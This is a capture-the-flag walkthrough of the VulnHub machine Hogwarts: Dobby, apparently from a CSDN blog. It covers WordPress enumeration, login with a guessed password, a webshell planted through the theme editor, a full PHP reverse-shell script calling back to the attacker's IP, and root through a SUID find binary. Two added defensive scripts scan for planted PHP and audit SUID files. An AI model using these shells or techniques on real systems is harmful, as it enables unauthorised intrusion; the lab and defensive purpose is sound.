VulnHub Project: Hogwarts dobby

Target machine: Hogwarts: Dobby ~ VulnHub

Harry Potter was also my favourite film series back in junior high~ Dobby was the Malfoy family's house-elf and first appeared in the second film, the Chamber of Secrets. He was later freed by Harry Potter's sock and became a happy, free elf. In the end he also rescued Harry Potter and his friends in the Deathly Hallows, but unfortunately he was stabbed by Bellatrix Lestrange's dagger during the final teleportation and died!

Penetration process:

Start by finding the target machine's IP address and scanning its ports. Only port 80 is open.

After accessing it, I found it is an Apache service, and the page header looks different.

Check the page source; there is an access path at the bottom:

 /alohomora

Alohomora, the unlocking spell.

Visiting it gives a hint: Draco Malfoy's password is his house. Write this hint down first.

 Brute-force the target machine's directories.

Found a log file and a PHP probe. Accessing the log reveals a pass and a path.

In that path I found something encoded in Brainfuck. I also saw the WordPress framework mentioned in the footer.

Decoding it gives garbled output, so ignore it for now.

 Since it is WordPress, run wpscan and enumerate to see what is there.

 As before, the user draco was found.

The default WordPress paths: wp-login.php and wp-content

Go to the login page and try draco. I thought the password was the pass from before, but it was wrong. The prompt here is still in Spanish.

Thinking back, the hint said the password is Malfoy's house. Malfoy is in Slytherin House, so is its English name the password?

draco:slytherin 

Tried it and logged in successfully. Oh my god, what is this? It's all in Spanish, I can't read it!

 Let's change the language first. Only English is available, so we'll go with that; it beats Spanish.

 After the change, look for a way to get a shell. There is a theme and it can be edited, which immediately brings the theme-editor vulnerability to mind: use the built-in editor to write a one-line webshell, then access the modified file and connect to it with AntSword. That's the plan!

Let's test the water first by writing a PHP probe into it.

 Then access the theme file, and it works!

 Then, without ceremony, write the one-liner and connect.

 

 Then I stumbled on a flag.

 

"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}

So how do we get a reverse shell back locally? The remaining steps could be done directly in AntSword, but I'm used to working in a local terminal. Edit the reverse-shell script below, putting the Kali IP and port into it, save it, upload it with AntSword, start a listener locally, then access the file from the browser, and that's it! That's the plan!


  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 [email protected]

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.56.136';  // You have changed this
  $port = 7899;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    
    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    
    if ($pid) {
      exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }

    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }

  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }

  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }

  // Set everything to non-blocking
  // Reason: Occasionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }

  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    global $daemon;  // needed so the daemon flag set above is visible here
    if (!$daemon) {
      print "$string\n";
    }
  }

  ?>
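
The theme-editor shell above and the reverse shell uploaded with it leave two artefacts a defender can look for: a PHP file under the theme directory that suddenly contains fsockopen/proc_open/eval calls, and executable PHP under wp-content/uploads. The script below is an added example, not code from the original post or from WordPress; it assumes a standard WordPress layout (wp-config.php at the site root, wp-content/themes, wp-content/uploads), and both the indicator list and the sample tree it scans are constructed.

```python
"""Added example (not from the original post or from WordPress): look for PHP
planted through the theme editor and check whether the editor is disabled."""
import re
import tempfile
from pathlib import Path

# Constructed indicator list: calls a theme template or upload has no business making.
INDICATORS = {
    "fsockopen": r"\bfsockopen\s*\(",                    # outbound TCP (reverse shell)
    "proc_open": r"\bproc_open\s*\(",                    # child process with piped stdio
    "exec-family": r"\b(shell_exec|exec|passthru|system|popen)\s*\(",
    "eval": r"\beval\s*\(",
    "base64_decode": r"\bbase64_decode\s*\(",            # common obfuscation wrapper
    "request-input": r"\$_(POST|GET|REQUEST)\s*\[",      # attacker-controlled input
}
_COMPILED = {name: re.compile(rx) for name, rx in INDICATORS.items()}


def score_php_source(src: str) -> dict:
    """Return {indicator: hit count} for every indicator present in the source."""
    hits = {}
    for name, rx in _COMPILED.items():
        n = len(rx.findall(src))
        if n:
            hits[name] = n
    return hits


def editor_disabled(root: str) -> bool:
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true (hides the theme editor)."""
    cfg = Path(root) / "wp-config.php"
    if not cfg.is_file():
        return False
    rx = r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)"
    return re.search(rx, cfg.read_text(errors="replace")) is not None


def scan_wordpress(root: str) -> list:
    """Scan theme and upload directories; return (relative path, reason, hits) tuples.
    Any .php under uploads is reported regardless of content; theme files only
    when an indicator matches."""
    base = Path(root)
    findings = []
    for sub in ("wp-content/themes", "wp-content/uploads"):
        d = base / sub
        if not d.is_dir():
            continue
        for path in sorted(d.rglob("*.php")):
            rel = str(path.relative_to(base))
            hits = score_php_source(path.read_text(errors="replace"))
            if sub.endswith("uploads"):
                findings.append((rel, "php-in-uploads", hits))
            elif hits:
                findings.append((rel, "suspicious-calls", hits))
    return findings


def build_sample_tree(root: str) -> None:
    """Write a constructed WordPress layout: one clean theme file, one theme
    template carrying a reverse-shell fragment, and a PHP probe under uploads."""
    base = Path(root)
    (base / "wp-content/themes/twentytwenty").mkdir(parents=True)
    (base / "wp-content/uploads/2023").mkdir(parents=True)
    (base / "wp-config.php").write_text("<?php define('DB_NAME', 'wp');\n")
    (base / "wp-content/themes/twentytwenty/functions.php").write_text(
        "<?php add_action('init', 'my_init');\n")
    (base / "wp-content/themes/twentytwenty/404.php").write_text(
        "<?php $s = fsockopen($ip, $port, $e, $m, 30); $p = proc_open($cmd, $spec, $pipes);\n")
    (base / "wp-content/uploads/2023/probe.php").write_text("<?php phpinfo();\n")


def demo():
    """Build the sample tree in a temp dir and return (editor_disabled, findings)."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    build_sample_tree(root)
    return editor_disabled(root), scan_wordpress(root)


if __name__ == "__main__":
    disabled, findings = demo()
    print("DISALLOW_FILE_EDIT set:", disabled)
    for rel, reason, hits in findings:
        print(f"{rel}: {reason} {hits}")
```

The editor itself is switched off by adding `define('DISALLOW_FILE_EDIT', true);` to wp-config.php, which removes the theme and plugin file editors from the dashboard; `editor_disabled` reports whether that line is already there. Running `scan_wordpress` against a real site root lists the files worth diffing against a clean copy of the theme.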
  

 

 Bingo, the reverse shell has come back. Let me add a few lines for fun.

I found that privileges can be escalated via find. It's easy and pleasant; I've used find this way many times before.

 The infinite universe of heaven and earth borrows the law! Break! Privilege escalation successful, rooted~
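
The escalation through find only works because find carries the setuid bit, which it never needs. The script below is an added example, not from the original post: it enumerates SUID files the way `find / -perm -4000 -type f` does and diffs the result against a known-good baseline so a stray bit shows up in an audit. The baseline and the sample listing are constructed; a real baseline should be captured from a freshly built reference image.

```python
"""Added example (not from the original post): enumerate SUID-root binaries
and diff them against a known-good baseline, so a stray setuid bit on a
tool like find is caught by an audit."""
import os
import stat
import tempfile

# Constructed baseline for a minimal Debian-like host. A real baseline should
# be captured from a reference image, not typed from memory.
BASELINE = frozenset({
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/umount",
})

# Constructed listing, as `find / -perm -4000 -type f` would print it on a box
# where the setuid bit has been added to find.
SAMPLE_LISTING = [
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/find",
]

SKIP_DIRS = ("/proc", "/sys", "/dev")


def collect_suid(root="/", uid=0):
    """Return sorted paths of regular files owned by `uid` with the setuid bit set
    (the same set `find ROOT -perm -4000 -type f -uid UID` reports)."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Do not descend into pseudo-filesystems when scanning from /.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)   # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == uid:
                found.append(p)
    return sorted(found)


def audit_suid(paths, baseline=BASELINE):
    """Split a listing into (unexpected, missing): binaries not in the baseline,
    and baseline entries the host no longer has (also worth a look)."""
    present = set(paths)
    return sorted(present - baseline), sorted(baseline - present)


def demo_collect():
    """Create a temp dir with one setuid file and one plain file; return
    (expected, found) so the walk can be checked without touching /."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    plain = os.path.join(root, "plain")
    marked = os.path.join(root, "marked")
    for p in (plain, marked):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(marked, 0o4755)
    # Some mounts silently drop the bit; only expect it if it actually stuck.
    stuck = bool(os.stat(marked).st_mode & stat.S_ISUID)
    expected = [marked] if stuck else []
    return expected, collect_suid(root, uid=os.getuid())


if __name__ == "__main__":
    unexpected, missing = audit_suid(SAMPLE_LISTING)
    print("unexpected SUID binaries:", unexpected)
    print("baseline entries missing:", missing)
    print("temp-dir walk (expected, found):", demo_collect())
```

An unexpected entry such as /usr/bin/find is fixed with `chmod u-s` on the binary, and the comparison is cheap enough to run from a cron job or a configuration-management check so that a newly added bit is noticed quickly rather than at the end of an incident.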

Check proof.txt. Hey, no cat yet, so let's go a bit further and get the final flag.

 root{63a9f0ea7bb98050796b649e85481845!!}

Summary:

The main vulnerability on this machine is the WordPress theme editor. Through it you get a low-privileged shell, and then escalate to root via SUID. Still very interesting~ It's just a matter of feeling~~~~

Please stay tuned: the Deathly Hallows series of Harry Potter machines will be released later. There are eight Hallows in total and 3 target machines, so stay tuned~


Source: blog.csdn.net/weixin_43938645/article/details/131049470